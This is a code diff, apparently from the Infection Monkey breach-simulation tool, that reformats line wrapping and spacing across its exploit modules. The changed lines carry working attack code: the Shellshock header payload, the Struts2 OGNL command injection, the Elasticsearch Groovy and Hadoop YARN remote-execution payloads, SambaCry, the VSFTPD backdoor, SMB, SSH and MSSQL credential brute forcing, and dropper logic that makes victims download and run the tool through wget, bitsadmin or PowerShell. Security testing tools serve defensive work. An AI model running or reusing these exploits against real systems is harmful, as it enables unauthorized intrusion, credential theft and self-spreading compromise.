'{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";'
@ -188,6 +195,6 @@ def build_cmd_execution_payload(base, cmd):
"".replace("|size|", str(len(cmd))).replace("|command|", cmd),
}
],
"_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}},
"_links":{"type":{"href":f"{urljoin(base, '/rest/type/shortcut/default')}"}},
}
return payload

View File

@ -1,6 +1,7 @@
"""
Implementation is based on elastic search groovy exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb
https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66
/modules/exploits/multi/elasticsearch/search_groovy_script.rb
Max vulnerable elasticsearch version is "1.4.2"
"""
@ -37,7 +38,8 @@ class ElasticGroovyExploiter(WebRCE):
)
JAVA_CMD = (
GENERIC_QUERY
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(
\\"%s\\").getText()"""
)
_TARGET_OS_TYPE = ["linux", "windows"]
@ -51,13 +53,14 @@ class ElasticGroovyExploiter(WebRCE):
exploit_config["dropper"] = True
exploit_config["url_extensions"] = ["_search?pretty"]
exploit_config["upload_commands"] = {
"linux": WGET_HTTP_UPLOAD,
"windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
"linux":WGET_HTTP_UPLOAD,
"windows":CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP,
}
return exploit_config
def get_open_service_ports(self, port_list, names):
# We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
# We must append elastic port we get from elastic fingerprint module because It's not
# marked as 'http' service
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
if ES_SERVICE in self.host.services:
valid_ports.append([ES_PORT, False])
@ -70,7 +73,8 @@ class ElasticGroovyExploiter(WebRCE):
response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT)
except requests.ReadTimeout:
LOG.error(
"Elastic couldn't upload monkey, because server didn't respond to upload request."
"Elastic couldn't upload monkey, because server didn't respond to upload "
"request."
)
return False
result = self.get_results(response)

View File

@ -1,6 +1,7 @@
"""
Remote code execution on HADOOP server with YARN and default settings
Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
Implementation is based on code from
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""
import json
@ -63,7 +64,8 @@ class HadoopExploiter(WebRCE):
def exploit(self, url, command):
# Get the newly created application id
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
timeout=LONG_REQUEST_TIMEOUT
)
resp = json.loads(resp.content)
app_id = resp["application-id"]
@ -73,7 +75,8 @@ class HadoopExploiter(WebRCE):
)
payload = self.build_payload(app_id, rand_name, command)
resp = requests.post(
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload,
timeout=LONG_REQUEST_TIMEOUT
)
return resp.status_code == 202
@ -90,7 +93,8 @@ class HadoopExploiter(WebRCE):
def build_command(self, path, http_path):
# Build command to execute
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
self.host, get_monkey_depth() - 1,
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
)
if "linux" in self.host.os["type"]:
base_command = HADOOP_LINUX_COMMAND
@ -98,22 +102,22 @@ class HadoopExploiter(WebRCE):
base_command = HADOOP_WINDOWS_COMMAND
return base_command % {
"monkey_path": path,
"http_path": http_path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
"monkey_path":path,
"http_path":http_path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
}
@staticmethod
def build_payload(app_id, name, command):
payload = {
"application-id": app_id,
"application-name": name,
"am-container-spec": {
"commands": {
"command": command,
"application-id":app_id,
"application-name":name,
"am-container-spec":{
"commands":{
"command":command,
}
},
"application-type": "YARN",
"application-type":"YARN",
}
return payload

View File

@ -56,7 +56,8 @@ class MSSQLExploiter(HostExploiter):
def _exploit_host(self):
"""
First this method brute forces to get the mssql connection (cursor).
Also, don't forget to start_monkey_server() before self.upload_monkey() and self.stop_monkey_server() after
Also, don't forget to start_monkey_server() before self.upload_monkey() and
self.stop_monkey_server() after
"""
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
@ -181,10 +182,12 @@ class MSSQLExploiter(HostExploiter):
Args:
host (str): Host ip address
port (str): Tcp port that the host listens to
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce
with
Return:
True or False depends if the whole bruteforce and attack process was completed successfully or not
True or False depends if the whole bruteforce and attack process was completed
successfully or not
"""
# Main loop
# Iterates on users list
@ -196,9 +199,9 @@ class MSSQLExploiter(HostExploiter):
host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
)
LOG.info(
"Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
host, user, self._config.hash_sensitive_data(password)
)
"Successfully connected to host: {0}, using user: {1}, password ("
"SHA-512): {2}".format(host, user,
self._config.hash_sensitive_data(password))
)
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
self.report_login_attempt(True, user, password)

View File

@ -54,7 +54,8 @@ LOG = logging.getLogger(__name__)
class SambaCryExploiter(HostExploiter):
"""
SambaCry exploit module, partially based on the following implementation by CORE Security Technologies' impacket:
SambaCry exploit module, partially based on the following implementation by CORE Security
Technologies' impacket:
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
"""
@ -94,7 +95,7 @@ class SambaCryExploiter(HostExploiter):
self.exploit_info["shares"] = {}
for share in writable_shares_creds_dict:
self.exploit_info["shares"][share] = {"creds": writable_shares_creds_dict[share]}
self.exploit_info["shares"][share] = {"creds":writable_shares_creds_dict[share]}
self.try_exploit_share(share, writable_shares_creds_dict[share])
# Wait for samba server to load .so, execute code and create result file.
@ -117,10 +118,10 @@ class SambaCryExploiter(HostExploiter):
if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result))
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
"username": creds["username"],
"host": self.host.ip_addr,
"port": self.SAMBA_PORT,
"share_name": share,
"username":creds["username"],
"host":self.host.ip_addr,
"port":self.SAMBA_PORT,
"share_name":share,
}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
@ -194,7 +195,8 @@ class SambaCryExploiter(HostExploiter):
file_content = None
try:
file_id = smb_client.openFile(
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA
)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
@ -235,12 +237,12 @@ class SambaCryExploiter(HostExploiter):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = [
{"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
{"username":user, "password":password, "lm_hash":lm_hash, "ntlm_hash":ntlm_hash}
for user, password, lm_hash, ntlm_hash in creds
]
# Add empty credentials for anonymous shares.
creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
creds.insert(0, {"username":"", "password":"", "lm_hash":"", "ntlm_hash":""})
return creds
@ -266,7 +268,7 @@ class SambaCryExploiter(HostExploiter):
pattern_result = pattern.search(smb_server_name)
is_vulnerable = False
if pattern_result is not None:
samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
samba_version = smb_server_name[pattern_result.start(): pattern_result.end()]
samba_version_parts = samba_version.split(".")
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
is_vulnerable = True
@ -372,7 +374,8 @@ class SambaCryExploiter(HostExploiter):
# the extra / on the beginning is required for the vulnerability
self.open_pipe(smb_client, "/" + module_path)
except Exception as e:
# This is the expected result. We can't tell whether we succeeded or not just by this error code.
# This is the expected result. We can't tell whether we succeeded or not just by this
# error code.
if str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
return True
else:
@ -403,7 +406,8 @@ class SambaCryExploiter(HostExploiter):
return BytesIO(
DROPPER_ARG
+ build_monkey_commandline(
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT, str(location)
self.host, get_monkey_depth() - 1, SambaCryExploiter.SAMBA_PORT,
str(location)
)
)
@ -450,7 +454,8 @@ class SambaCryExploiter(HostExploiter):
)
return smb_client
# Following are slightly modified SMB functions from impacket to fit our needs of the vulnerability #
# Following are slightly modified SMB functions from impacket to fit our needs of the
# vulnerability #
@staticmethod
def create_smb(
smb_client,
@ -513,7 +518,8 @@ class SambaCryExploiter(HostExploiter):
@staticmethod
def open_pipe(smb_client, pathName):
# We need to overwrite Impacket's openFile functions since they automatically convert paths to NT style
# We need to overwrite Impacket's openFile functions since they automatically convert
# paths to NT style
# to make things easier for the caller. Not this time ;)
treeId = smb_client.connectTree("IPC$")
LOG.debug("Triggering path: %s" % pathName)

View File

@ -1,4 +1,5 @@
# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py
# Implementation is based on shellshock script provided
# https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
import string
@ -28,7 +29,7 @@ LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
_attacks = {"Content-type": "() { :;}; echo; "}
_attacks = {"Content-type":"() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
@ -44,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
def _exploit_host(self):
# start by picking ports
candidate_services = {
service: self.host.services[service]
service:self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http")
@ -113,7 +114,8 @@ class ShellShockExploiter(HostExploiter):
self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)
):
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected
@ -241,7 +243,7 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(
url, headers={header: attack}, verify=False, timeout=TIMEOUT
url, headers={header:attack}, verify=False, timeout=TIMEOUT
) # noqa: DUO123
result = r.content.decode()
return result
@ -270,7 +272,8 @@ class ShellShockExploiter(HostExploiter):
break
if timeout:
LOG.debug(
"Some connections timed out while sending request to potentially vulnerable urls."
"Some connections timed out while sending request to potentially vulnerable "
"urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]

View File

@ -24,8 +24,8 @@ class SmbExploiter(HostExploiter):
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = {
"139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445),
"139/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 139),
"445/SMB":(r"ncacn_np:%s[\pipe\svcctl]", 445),
}
USE_KERBEROS = False
@ -75,7 +75,8 @@ class SmbExploiter(HostExploiter):
if remote_full_path is not None:
LOG.debug(
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
"Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
"%s : (SHA-512) %s)",
self.host,
user,
self._config.hash_sensitive_data(password),
@ -99,7 +100,8 @@ class SmbExploiter(HostExploiter):
except Exception as exc:
LOG.debug(
"Exception when trying to copy file using SMB to %r with user:"
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)",
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s: (%s)",
self.host,
user,
self._config.hash_sensitive_data(password),
@ -117,7 +119,7 @@ class SmbExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {
"dropper_path": remote_full_path
"dropper_path":remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -126,7 +128,7 @@ class SmbExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {
"monkey_path": remote_full_path
"monkey_path":remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port
)

View File

@ -58,7 +58,8 @@ class SSHExploiter(HostExploiter):
try:
ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port)
LOG.debug(
"Successfully logged in %s using %s users private key", self.host, ssh_string
"Successfully logged in %s using %s users private key", self.host,
ssh_string
)
self.report_login_attempt(True, user, ssh_key=ssh_string)
return ssh
@ -157,7 +158,8 @@ class SSHExploiter(HostExploiter):
if stdout_res:
# file exists
LOG.info(
"Host %s was already infected under the current configuration, done" % self.host
"Host %s was already infected under the current configuration, "
"done" % self.host
)
return True # return already infected

View File

@ -35,7 +35,8 @@ class Struts2Exploiter(WebRCE):
def build_potential_urls(self, ports, extensions=None):
"""
We need to override this method to get redirected url's
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
@ -47,7 +48,7 @@ class Struts2Exploiter(WebRCE):
@staticmethod
def get_redirected(url):
# Returns false if url is not right
headers = {"User-Agent": "Mozilla/5.0"}
headers = {"User-Agent":"Mozilla/5.0"}
request = urllib.request.Request(url, headers=headers)
try:
return urllib.request.urlopen(
@ -84,7 +85,7 @@ class Struts2Exploiter(WebRCE):
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
"(#ros.flush())}" % cmd
)
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
headers = {"User-Agent":"Mozilla/5.0", "Content-Type":payload}
try:
request = urllib.request.Request(url, headers=headers)
# Timeout added or else we would wait for all monkeys' output

View File

@ -26,12 +26,12 @@ def zerologon_exploiter_object(monkeypatch):
def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode": 0}
dummy_exploit_attempt_result = {"ErrorCode":0}
assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
dummy_exploit_attempt_result = {"ErrorCode": 1}
dummy_exploit_attempt_result = {"ErrorCode":1}
assert not zerologon_exploiter_object.assess_exploit_attempt_result(
dummy_exploit_attempt_result
)
@ -56,15 +56,15 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]: {
"RID": int(RIDS[0]),
"lm_hash": LM_HASHES[0],
"nt_hash": NT_HASHES[0],
USERS[0]:{
"RID":int(RIDS[0]),
"lm_hash":LM_HASHES[0],
"nt_hash":NT_HASHES[0],
},
USERS[1]: {
"RID": int(RIDS[1]),
"lm_hash": LM_HASHES[1],
"nt_hash": NT_HASHES[1],
USERS[1]:{
"RID":int(RIDS[1]),
"lm_hash":LM_HASHES[1],
"nt_hash":NT_HASHES[1],
},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
@ -76,8 +76,8 @@ def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object):
f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS))
]
expected_extracted_creds = {
USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""},
USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""},
USERS[0]:{"RID":int(RIDS[0]), "lm_hash":"", "nt_hash":""},
USERS[1]:{"RID":int(RIDS[1]), "lm_hash":"", "nt_hash":""},
}
assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None
assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds

View File

@ -29,7 +29,8 @@ def get_target_monkey(host):
if not monkey_path:
if host.os.get("type") == platform.system().lower():
# if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe
# if exe not found, and we have the same arch or arch is unknown and we are 32bit,
# use our exe
if (not host.os.get("machine") and sys.maxsize < 2 ** 32) or host.os.get(
"machine", ""
).lower() == platform.machine().lower():

View File

@ -17,7 +17,8 @@ class Payload(object):
def get_payload(self, command=""):
"""
Returns prefixed and suffixed command (payload)
:param command: Command to suffix/prefix. If no command is passed than objects' property is used
:param command: Command to suffix/prefix. If no command is passed than objects' property
is used
:return: prefixed and suffixed command (full payload)
"""
if not command:
@ -46,7 +47,8 @@ class LimitedSizePayload(Payload):
def split_into_array_of_smaller_payloads(self):
if self.is_suffix_and_prefix_too_long():
raise Exception(
"Can't split command into smaller sub-commands because commands' prefix and suffix already "
"Can't split command into smaller sub-commands because commands' prefix and "
"suffix already "
"exceeds required length of command."
)

View File

@ -32,7 +32,8 @@ class TestPayload(TestCase):
pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix")
array2 = pld2.split_into_array_of_smaller_payloads()
test2 = bool(
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2
array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(
array2) == 2
)
assert test1 and test2

View File

@ -36,7 +36,8 @@ class SmbTools(object):
# skip guest users
if smb.isGuestSession() > 0:
LOG.debug(
"Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
"Connection to %r granted guest privileges with user: %s, password (SHA-512): "
"'%s',"
" LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
host,
username,
@ -59,12 +60,12 @@ class SmbTools(object):
return None
info = {
"major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
"major_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"],
"minor_version":resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"],
"server_name":resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "),
"server_comment":resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "),
"server_user_path":resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "),
"simultaneous_users":resp["InfoStruct"]["ServerInfo102"]["sv102_users"],
}
LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info))
@ -102,10 +103,10 @@ class SmbTools(object):
)
continue
share_info = {"share_name": share_name, "share_path": share_path}
share_info = {"share_name":share_name, "share_path":share_path}
if dst_path.lower().startswith(share_path.lower()):
high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),)
high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),)
low_priority_shares += ((ntpath.sep + file_name, share_info),)
@ -127,7 +128,8 @@ class SmbTools(object):
smb.connectTree(share_name)
except Exception as exc:
LOG.debug(
"Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc
"Error connecting tree to share '%s' on victim %r: %s", share_name, host,
exc
)
continue
@ -151,7 +153,8 @@ class SmbTools(object):
return remote_full_path
LOG.debug(
"Remote monkey file is found but different, moving along with attack"
"Remote monkey file is found but different, moving along with "
"attack"
)
except Exception:
pass # file isn't found on remote victim, moving on
@ -164,7 +167,8 @@ class SmbTools(object):
file_uploaded = True
T1105Telem(
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path
ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr,
dst_path
).send()
LOG.info(
"Copied monkey file '%s' to remote share '%s' [%s] on victim %r",
@ -177,7 +181,8 @@ class SmbTools(object):
break
except Exception as exc:
LOG.debug(
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc
"Error uploading monkey to share '%s' on victim %r: %s", share_name, host,
exc
)
T1105Telem(
ScanStatus.SCANNED,
@ -197,7 +202,8 @@ class SmbTools(object):
if not file_uploaded:
LOG.debug(
"Couldn't find a writable share for exploiting victim %r with "
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
"SHA-512): %s",
host,
username,
Configuration.hash_sensitive_data(password),
@ -222,9 +228,9 @@ class SmbTools(object):
return None, None
dialect = {
SMB_DIALECT: "SMBv1",
SMB2_DIALECT_002: "SMBv2.0",
SMB2_DIALECT_21: "SMBv2.1",
SMB_DIALECT:"SMBv1",
SMB2_DIALECT_002:"SMBv2.0",
SMB2_DIALECT_21:"SMBv2.1",
}.get(smb.getDialect(), "SMBv3.0")
# we know this should work because the WMI connection worked

View File

@ -1,6 +1,7 @@
"""
Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp
/vsftpd_234_backdoor.rb
only vulnerable version is "2.3.4"
"""
@ -121,7 +122,7 @@ class VSFTPDExploiter(HostExploiter):
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path}
download_command = WGET_HTTP_UPLOAD % {"monkey_path":monkey_path, "http_path":http_path}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
@ -134,7 +135,7 @@ class VSFTPDExploiter(HostExploiter):
http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = CHMOD_MONKEY % {"monkey_path":monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
@ -145,13 +146,14 @@ class VSFTPDExploiter(HostExploiter):
self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
)
run_monkey = RUN_MONKEY % {
"monkey_path": monkey_path,
"monkey_type": MONKEY_ARG,
"parameters": parameters,
"monkey_path":monkey_path,
"monkey_type":MONKEY_ARG,
"parameters":parameters,
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
# we don't have to revert the ulimit because it just applies to the shell obtained by our
# exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)

View File

@ -52,9 +52,9 @@ class WebRCE(HostExploiter):
self.monkey_target_paths = monkey_target_paths
else:
self.monkey_target_paths = {
"linux": self._config.dropper_target_path_linux,
"win32": self._config.dropper_target_path_win_32,
"win64": self._config.dropper_target_path_win_64,
"linux":self._config.dropper_target_path_linux,
"win32":self._config.dropper_target_path_win_32,
"win64":self._config.dropper_target_path_win_64,
}
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
@ -69,21 +69,27 @@ class WebRCE(HostExploiter):
"""
exploit_config = {}
# dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
# dropper: If true monkey will use dropper parameter that will detach monkey's process
# and try to copy
# it's file to the default destination path.
exploit_config["dropper"] = False
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,
# 'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults
# will be used.
exploit_config["upload_commands"] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home",
# "index.php"]
exploit_config["url_extensions"] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found
# vulnerable.
exploit_config["stop_checking_urls"] = False
# blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
# blind_exploit: If true we won't check if file exist and won't try to get the
# architecture of target.
exploit_config["blind_exploit"] = False
return exploit_config
@ -164,7 +170,7 @@ class WebRCE(HostExploiter):
candidate_services = {}
candidate_services.update(
{
service: self.host.services[service]
service:self.host.services[service]
for service in self.host.services
if (
self.host.services[service]
@ -196,11 +202,12 @@ class WebRCE(HostExploiter):
else:
command = commands["windows"]
# Format command
command = command % {"monkey_path": path, "http_path": http_path}
command = command % {"monkey_path":path, "http_path":http_path}
except KeyError:
LOG.error(
"Provided command is missing/bad for this type of host! "
"Check upload_monkey function docs before using custom monkey's upload commands."
"Check upload_monkey function docs before using custom monkey's upload "
"commands."
)
return False
return command
@ -225,8 +232,10 @@ class WebRCE(HostExploiter):
def build_potential_urls(self, ports, extensions=None):
"""
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and
extensions.
:param ports: Array of ports. One port is described as size 2 array: [port.no(int),
isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
@ -253,7 +262,8 @@ class WebRCE(HostExploiter):
"""
Gets vulnerable url(s) from url list
:param urls: Potentially vulnerable urls
:param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool)
:param stop_checking: If we want to continue checking for vulnerable url even though one
is found (bool)
:return: None (we append to class variable vulnerable_urls)
"""
for url in urls:
@ -330,7 +340,8 @@ class WebRCE(HostExploiter):
Get ports wrapped with log
:param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS
:param names: [] of service names. Example: ["http"]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [
port.nr, IsHTTPS?]
"""
ports = self.get_open_service_ports(ports, names)
if not ports:
@ -350,7 +361,8 @@ class WebRCE(HostExploiter):
def run_backup_commands(self, resp, url, dest_path, http_path):
"""
If you need multiple commands for the same os you can override this method to add backup commands
If you need multiple commands for the same os you can override this method to add backup
commands
:param resp: Response from base command
:param url: Vulnerable url
:param dest_path: Where to upload monkey
@ -360,8 +372,8 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = BITSADMIN_CMDLINE_HTTP % {
"monkey_path": dest_path,
"http_path": http_path,
"monkey_path":dest_path,
"http_path":http_path,
}
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command)
@ -370,7 +382,8 @@ class WebRCE(HostExploiter):
def upload_monkey(self, url, commands=None):
"""
:param url: Where exploiter should send it's request
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD}
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows':
WIN_CMD}
Command must have "monkey_path" and "http_path" format parameters.
:return: {'response': response/False, 'path': monkeys_path_in_host}
"""
@ -389,7 +402,7 @@ class WebRCE(HostExploiter):
LOG.info("Started http server on %s", http_path)
# Choose command:
if not commands:
commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
commands = {"windows":POWERSHELL_HTTP_UPLOAD, "linux":WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands)
resp = self.exploit(url, command)
self.add_executed_cmd(command)
@ -402,7 +415,7 @@ class WebRCE(HostExploiter):
if resp is False:
return resp
else:
return {"response": resp, "path": paths["dest_path"]}
return {"response":resp, "path":paths["dest_path"]}
def change_permissions(self, url, path, command=None):
"""
@ -417,7 +430,7 @@ class WebRCE(HostExploiter):
LOG.info("Permission change not required for windows")
return True
if not command:
command = CHMOD_MONKEY % {"monkey_path": path}
command = CHMOD_MONKEY % {"monkey_path":path}
try:
resp = self.exploit(url, command)
T1222Telem(ScanStatus.USED, command, self.host).send()
@ -435,7 +448,8 @@ class WebRCE(HostExploiter):
return False
elif "No such file or directory" in resp:
LOG.error(
"Could not change permission because monkey was not found. Check path parameter."
"Could not change permission because monkey was not found. Check path "
"parameter."
)
return False
LOG.info("Permission change finished")
